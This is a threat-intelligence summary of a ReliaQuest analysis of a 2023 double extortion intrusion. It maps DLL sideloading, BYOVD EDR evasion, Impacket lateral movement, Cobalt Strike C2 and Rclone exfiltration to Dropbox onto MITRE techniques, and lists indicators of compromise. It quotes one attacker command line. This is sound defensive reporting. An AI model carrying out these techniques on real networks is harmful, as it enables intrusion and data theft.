Threat Research

Double Extortion Attack Analysis – ReliaQuest

Reliaquest

ReliaQuest analyzed a September 2023 double extortion incident where data was encrypted and threats were made to publish stolen data. The threat actor used sophisticated TTPs—DLL sideloading, BYOVD to evade EDR, Impacket-based lateral movement, and Rclone-based exfiltration to Dropbox—to operate stealthily. #CobaltStrike #RedGuard #api.whitelrose.com #NetScalerCVE3519 #BYOVD #DLLSideLoading #Rclone #Dropbox

Keypoints

  • In early September 2023, ReliaQuest detected suspicious process executions within a customer’s environment originating from the Windows debug directory, later linked to a double extortion incident.
  • The actor used a digitally signed and vulnerable Palo Alto Cortex XDR binary for DLL sideloading, and employed a BYOVD approach to hinder EDR by unhooking security tools.
  • Initial access is traced to exploiting a NetScaler AD vulnerability (CVE-2023-3519), providing initial access and a path to AD credentials and domain traversal.
  • Lateral movement relied on Impacket’s wmiexec module to reach key devices, notably a domain controller, using a privileged service account.
  • DLL sideloading involved loading a malicious DLL (ntnativeapi.dll) alongside cyuserserver.exe, a signed Palo Alto Cortex XDR component, enabling execution under a legitimate process context.
  • C2 activity used a traditional in-memory beacon, with CyUserserver.exe loading the implant into dllhost.exe and connecting to a Cobalt Strike server (api.whitelrose.com; 45.77.120.140).
  • Exfiltration leveraged Rclone to copy data to Dropbox (storagesite) using a renamed binary (firefox.exe) and an associated rclone.conf file that was later deleted.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Exploited a vulnerability in NetScaler AD CVE-2023-3519 to gain initial access. Quote: ‘exploiting a vulnerability in NetScaler AD CVE-2023-3519.’
  • [T1047] Windows Management Instrumentation – Used Impacket’s wmiexec module to move laterally to domain controller. Quote: ‘the threat actor used Impacket’s wmiexec module to laterally move within the environment to target key devices—most notably, to a domain controller, [Domain-Controller01].’
  • [T1574.002] DLL Side-Loading – Ingressed ntnativeapi.dll and cyuserserver.exe via DLL sideloading. Quote: ‘an attacker ingressed a DLL, ntnativeapi.dll, and a binary, cyuserserver.exe, which, notably, was digitally signed by Palo Alto as a component of their Cortex XDR agent.’
  • [T1562.001] Impair Defenses – BYOVD used to unhook EDR and hinder defensive measures. Quote: ‘a BYOVD attack to hinder defensive measures by unhooking Endpoint Detection and Response (EDR)’.
  • [T1053.005] Scheduled Task – cyuserserver.exe was executed via a scheduled task. Quote: ‘Shortly after the cyuserserver.exe file was written to [Win-Server], it was executed via a scheduled task.’
  • [T1055] Process Injection – DLL-based payloads loaded into dllhost.exe, enabling memory-resident beacons. Quote: ‘dllhost.exe process being created, then injected into, and, ultimately, establishing a connection to a Cobalt Strike team server.’
  • [T1059.003] Windows Command Shell – Command line used to execute remote commands. Quote: ‘cmd.exe /Q /c cd windows/debug 1> 127.0.0.1ADMIN$__1693526401.246018 2>&1’
  • [T1567.002] Exfiltration to Cloud Storage – Exfiltrated data via Rclone to Dropbox. Quote: ‘The firefox.exe binary was seen resolving and connecting to dropboxapi[.]com, indicating that the threat actor used Dropbox for their remote storage system.’
  • [T1218] Signed Binary Proxy Execution – Leveraged a signed Cortex XDR component to run malicious DLL. Quote: ‘a binary, cyuserserver.exe, which, notably, was digitally signed by Palo Alto as a component of their Cortex XDR agent.’

Indicators of Compromise

  • [IP Address] 45.77.120.140 – Cobalt Strike team server; resolved from api.whitelrose.com
  • [Domain] api.whitelrose.com – Cobalt Strike team server
  • [SHA256] d3eae40d08a9ed0306b142a9abad40b615201515af35581b7a0585e334ad43f4 – ntnativeapi.dll
  • [SHA256] f6b3cc9e3af99106ae3262ea360c0c51ea6c8341270fdae47bb5ea4655eb4853 – cyuserserver.exe
  • [SHA256] 966256acc79eb07799262c376a7333155675591d61e3315cc15b2d6dcccb3a00 – Renamed Rclone binary
  • [SHA256] 20398192fbef1924202a82fcd3459ef901999cebed02ead665c1f9a5087016a8 – Renamed IObitUnlocker.sys driver

Read more: https://www.reliaquest.com/blog/double-extortion-attack-analysis/